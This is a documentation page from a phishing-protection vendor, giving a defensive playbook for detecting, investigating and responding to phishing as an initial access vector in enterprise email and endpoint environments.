Skip to content

Docs

Guides

Changelog

CtrlK
Docs

Advanced Knowledge

Phishing Initial Access

Phishing Initial Access

Detect and investigate phishing as an initial access vector in enterprise environments.

Last updated: February 2026

Purpose and Scope

Phishing remains the most common initial access technique used by attackers. This playbook covers detecting phishing delivery, analyzing payloads, and investigating compromises that begin with a malicious email or message.

Prerequisites

  • Email telemetry: Mail gateway logs, Microsoft 365 message trace, Google Workspace email logs
  • Endpoint telemetry: EDR with process creation, file writes, and network connections
  • SIEM integration: Email and endpoint logs correlated in your analysis platform
  • Threat intelligence: Access to IOC feeds and URL/file reputation services

Detection Goals

Identify and respond to:

  • Malicious email delivery bypassing gateway filters
  • User interaction with phishing links or attachments
  • Credential theft on fake login pages
  • Payload execution following phishing
  • Lateral movement after initial compromise

Key Data Sources

Email Gateway and Provider Logs

  • Microsoft 365: Message trace, Safe Links, Safe Attachments verdicts
  • Google Workspace: Gmail logs in BigQuery or SIEM export
  • Secure email gateways: Proofpoint, Mimecast, Barracuda logs

Key fields: sender, recipient, subject, URLs in body, attachment names, attachment hashes, delivery action, verdict.

Endpoint Telemetry

Correlate email events with endpoint activity:

  • Outlook or browser spawning child processes
  • File writes from email attachments
  • Network connections initiated after email arrival

Investigation Workflow

1. Identify the Phishing Email

  • Locate the email in gateway logs using sender, subject, or attachment hash
  • Identify all recipients who received the same message
  • Check delivery status: was it quarantined, delivered, or clicked?
  • Extract indicators: sender domain, reply to address, URLs, attachment hashes

2. Analyze Indicators

  • Check URLs against VirusTotal, urlscan.io, and internal blocklists
  • Submit attachments to sandbox analysis
  • Look up sender domain age, reputation, and SPF/DKIM/DMARC results
  • Check if the sender domain is a typosquat of a known brand

3. Determine User Interaction

For each recipient, determine if they:

  • Opened the email (if tracking available)
  • Clicked links (Safe Links logs, web proxy, endpoint browser history)
  • Opened attachments (endpoint file access logs)
  • Entered credentials (check for subsequent anomalous logins)
  • Executed payloads (endpoint process creation)

4. Check for Post-Compromise Activity

If users interacted with the phishing content:

  • Review authentication logs for the affected accounts
  • Look for mailbox rule changes (forwarding, deletion rules)
  • Check for OAuth application consent grants
  • Examine endpoint for persistence mechanisms
  • Search for lateral movement to other systems

5. Scope the Incident

  • How many users received the email?
  • How many interacted with it?
  • How many show signs of compromise?
  • Are other systems affected?

Common Phishing Patterns

Credential Phishing

Fake login pages for Microsoft 365, Google, banking, or internal applications. Look for:

  • Links to lookalike domains
  • Redirects through legitimate services (Google Docs, Azure Blob)
  • QR codes leading to phishing pages

Attachment Based Payloads

  • Office documents with macros
  • HTML attachments with embedded JavaScript
  • ISO/IMG files containing executables
  • Password protected archives

Business Email Compromise (BEC)

No malware, but social engineering to redirect payments or steal data:

  • Impersonation of executives or vendors
  • Requests to change payment details
  • Urgency and secrecy themes

Response Actions

  • Quarantine: Remove the email from all recipient mailboxes
  • Block indicators: Add sender, URLs, and hashes to blocklists
  • Reset credentials: For users who entered credentials on phishing pages
  • Revoke sessions: Force reauthentication for compromised accounts
  • Notify users: Alert recipients who did not interact yet
  • Hunt for related activity: Search for other emails from the same campaign

Tuning and False Positives

  • Legitimate marketing emails may trigger link click alerts
  • Internal phishing simulations should be excluded from escalation
  • Automated email forwarding can make attribution difficult
  • Build allowlists for known safe senders and domains

References

Previous

Network Telemetry and Lateral Movement

Next

Malware and Script Payload Triage

Was this helpful?

Logo

Block phishing attacks instantly.

Built by RedPhish LLC. All Rights Reserved. Copyright 2025.

Terms & Conditions

Privacy Policy

Compare

Guardio AlternativeMalwarebytes AlternativeNorton AlternativeAvast AlternativeBitdefender Alternative

Resources

DocumentationBlogPricingFAQ